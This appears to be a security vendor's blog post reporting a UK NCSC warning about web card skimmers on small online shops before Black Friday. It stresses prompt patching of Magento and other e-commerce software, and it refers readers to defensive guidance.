The UK's top cybercops are urging owners of small online shops to "protect their customers and profits" by guarding against card skimmers in the frenetic shopping period that starts with Black Friday, which lands on November 26 this year.
The warning comes from the National Cyber Security Centre (NCSC)—which is part of GCHQ, the UK's equivalent to the NSA—which says it identified 4,151 compromised online shops up to the end of September.
Card skimmers, also know as web skimmers, are bits of malicious software that are injected into legitimate websites, so they can steal shoppers’ credit card details. The skimmers read the details as users type them into the sites’ payment forms, or replace the payment forms with convincing fakes.
The longer that cybercriminals can keep their card skimmers on a website before its customers or owners notice, the more money they will make, so they take care to be as unobtrusive as possible. Unsurprisingly, Malwarebytes' own research has shown that card skimming activity tends to ramp up on the busiest shopping days, when the most money changes hands. And some of the biggest shopping days of the year are nearly upon us, starting with Black Friday, the biggest of them all.
For the uninitiated, Black Friday is the annual celebration of peak capitalism that commemorates the symbolic moment that retailers go "in to the black" for the year and start to make a profit. If you're wondering why shoppers would be so keen to celebrate the mechanics of retail accountancy, it's because shops mark the occasion (the Friday that follows Thanksgiving in the US) with extravagant sales, offers, and deals.
The NCSC is rightly concerned that with record amounts of money expected to slosh about on the Internet in the next few days, cybercriminals will be hard at work, spoiling everyone's fun.
It is worth noting that the NCSC's announcement uses the word "small" no less than four times— "small online shops"; "small business sites"; "small online retailers"; "small and medium-sized online retailers"—in a short announcement that also mentions "SMEs" twice, and says it is written for "small & medium sized organisations".
On the off-chance the point still hasn't landed, let me spell it out for you: The NCSC would like you to know that no online business is small enough to ignore the threat of card skimmers.
I will add a personal note to that too. If you assume you are too small to be attacked by a card skimmer and your customers later find out their card details were stolen while on your site, they will expect you to have cared a great deal more. At least that's how I felt when it happened to me.
Not just Magento
Although its guidance is aimed at all e-commerce retailers, the NCSC makes specific mention of sites built on the Magento platform, which it says has been particularly popular with cybercriminals lately:
The majority of the online shops used for skimming identified by the NCSC had been compromised via a known vulnerability in Magento, a popular e-commerce platform.
However, your takeaway after reading that should not be "Magento" so much as "known vulnerability". Cybercriminals do not care that you're running Magento, they only care that you are running a system they can exploit because it contains a known vulnerability, and any system with a known vulnerability will do, thanks. It so happens that Magento has been a prime target recently, but every decent e-commerce system has known vulnerabilities. Not using Magento is no protection whatsoever.
What really matters is whether or not ecommerce sites are patched promptly when fixes for vulnerabilities are made available. Which is why the NCSC's headline guidance is "Retailers are urged to ensure that Magento—and any other software they use—is up to date".
Keeping website software up to date will certainly take you a very long way indeed in terms of protecting against card skimmers, but there is more to it than that.
For the "more to it than that", the NCSC point readers to the British Retail Consortium's Cyber Resilience Toolkit for Retail, and its own website, which is full of useful cybersecurity advice, although neither resource is specifically about card skimming.
I would like to humbly suggest that readers should also consult our own guidance on how to defend your website against card skimmers. Our easy-to-digest advice is aimed at preventing card skimming specifically and explains how card skimming gangs find victims; why everyone is a potential target; how to avoid a website breach; how to protect your customers from a card skimmer if you are breached; and how to detect card skimmers as quickly as possible.